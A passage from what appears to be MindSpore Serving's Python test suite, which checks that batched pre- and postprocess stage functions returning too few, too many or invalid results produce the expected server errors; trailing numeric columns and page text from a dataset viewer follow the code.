@register.register_method(output_names=["y1"])
def predict(x1, x2):
    y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
    return y1
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: the stage returns None instead of results, expect an error reply.
    instances = []
    for i in range(3):
        a = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        b = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
        instances.append({"x1": a, "x2": b})
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    err = result["error"] if isinstance(result, dict) else result[0]["error"]
    assert "servable is not available" in err \
           or f"Call Function '{base.servable_name}.func_test_batch' Failed" in err
@serving_test
def test_stage_function_one_function_stage_batch_size_invalid_output_dtype_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, return invalid data
    Expectation: Serving server report error.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y1 = instance[0] + instance[1]
        y2 = instance[0] - instance[1]
        results.append([y1.dtype, y2.dtype])
    return results
@register.register_method(output_names=["y1"])
def predict(x1, x2):
    y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
    return y1
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: the stage returns dtype objects, which are not valid tensor outputs.
    instances = []
    for i in range(3):
        a = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        b = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
        instances.append({"x1": a, "x2": b})
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    err = result["error"] if isinstance(result, dict) else result[0]["error"]
    assert "servable is not available" in err \
           or f"Call Function '{base.servable_name}.func_test_batch' Failed" in err
@serving_test
def test_servable_postprocess_result_count_less():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, return instances count less than input
        instances count
    Expectation: Serving server report error.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def postprocess(instances):
    count = len(instances)
    for i in range(count -1):
        yield i
@register.register_method(output_names=["y"])
def add_common(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    y = register.add_stage(postprocess, y, outputs_count=1, batch_size=4, tag="Postprocess")
    return y
"""
    base = start_serving_server(servable_content)
    # Client: postprocess yields one result fewer than the instance count, so the
    # second instance must come back with an error message.
    instance_count = 2
    instances = []
    for i in range(instance_count):
        x1 = np.asarray([[1.1], [3.3]]).astype(np.float32) * (i + 1)
        x2 = np.asarray([[5.5], [7.7]]).astype(np.float32) * (i + 1)
        instances.append({"x1": x1, "x2": x2})
    client = create_client("localhost:5500", base.servable_name, "add_common")
    result = client.infer(instances)
    print(result)
    error_msg = str(result[1]["error"])
    assert "Postprocess Failed" in error_msg or 'servable is not available' in error_msg
@serving_test
def test_servable_postprocess_result_count_more():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, return instances count more than input
        instances count
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def postprocess(instances):
    count = len(instances)
    for i in range(count + 1):
        yield i
@register.register_method(output_names=["y"])
def add_common(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    y = register.add_stage(postprocess, y, outputs_count=1, batch_size=4, tag="Postprocess")
    return y
"""
    base = start_serving_server(servable_content)
    # Client: postprocess yields one extra result; the surplus must be dropped and
    # each instance gets its own index as output.
    instance_count = 2
    instances = []
    for i in range(instance_count):
        x1 = np.asarray([[1.1], [3.3]]).astype(np.float32) * (i + 1)
        x2 = np.asarray([[5.5], [7.7]]).astype(np.float32) * (i + 1)
        instances.append({"x1": x1, "x2": x2})
    client = create_client("localhost:5500", base.servable_name, "add_common")
    result = client.infer(instances)
    print(result)
    assert len(result) == instance_count
    # postprocess yields the running index, so outputs are 0 and 1.
    assert result[0]["y"] == 0
    assert result[1]["y"] == 1
@serving_test
def test_stage_function_preprocess_result_count_less():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, return instances count less than input
        instances count
    Expectation: Serving server report error.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def preprocess(instances):
    count = len(instances)
    for i in range(count-1):
        yield i
@register.register_method(output_names=["y"])
def add_common(x1, x2):
    x3 = register.add_stage(preprocess, x1, outputs_count=1, batch_size=4, tag="Preprocess")
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return x3
"""
    base = start_serving_server(servable_content)
    # Client: preprocess yields one result fewer than the instance count, so the
    # server must report an error for the missing instance.
    instance_count = 2
    instances = []
    for i in range(instance_count):
        x1 = np.asarray([[1.1], [3.3]]).astype(np.float32) * (i + 1)
        x2 = np.asarray([[5.5], [7.7]]).astype(np.float32) * (i + 1)
        instances.append({"x1": x1, "x2": x2})
    client = create_client("localhost:5500", base.servable_name, "add_common")
    result = client.infer(instances)
    print(result)
    # The error may be reported per-instance (list) or for the whole request (dict).
    if isinstance(result, list):
        assert "Preprocess Failed" in str(result[1]["error"]) or "servable is not available" in str(result[1]["error"])
    else:
        assert "Preprocess Failed" in str(result["error"]) or "servable is not available" in str(result["error"])
@serving_test
def test_stage_function_preprocess_result_count_more():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, return instances count more than input
        instances count
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def preprocess(instances):
    count = len(instances)
    for i in range(count+1):
        yield i
@register.register_method(output_names=["y"])
def add_common(x1, x2):
    x3 = register.add_stage(preprocess, x1, outputs_count=1, batch_size=4, tag="Preprocess")
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return x3
"""
    base = start_serving_server(servable_content)
    # Client: preprocess yields one extra result; the surplus must be dropped and
    # every instance still gets a reply.
    instance_count = 3
    instances = []
    for i in range(instance_count):
        x1 = np.asarray([[1.1], [3.3]]).astype(np.float32) * (i + 1)
        x2 = np.asarray([[5.5], [7.7]]).astype(np.float32) * (i + 1)
        instances.append({"x1": x1, "x2": x2})
    client = create_client("localhost:5500", base.servable_name, "add_common")
    result = client.infer(instances)
    print(result)
    assert len(result) == instance_count
| 36.532353
| 119
| 0.669833
| 7,189
| 49,684
| 4.447211
| 0.033523
| 0.015264
| 0.024866
| 0.02984
| 0.959401
| 0.954021
| 0.949673
| 0.948328
| 0.947296
| 0.941259
| 0
| 0.044901
| 0.193141
| 49,684
| 1,359
| 120
| 36.559235
| 0.752619
| 0.130082
| 0
| 0.897959
| 0
| 0.010204
| 0.462008
| 0.189746
| 0
| 0
| 0
| 0
| 0.093878
| 1
| 0.034694
| false
| 0.00102
| 0.070408
| 0.00102
| 0.157143
| 0.029592
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.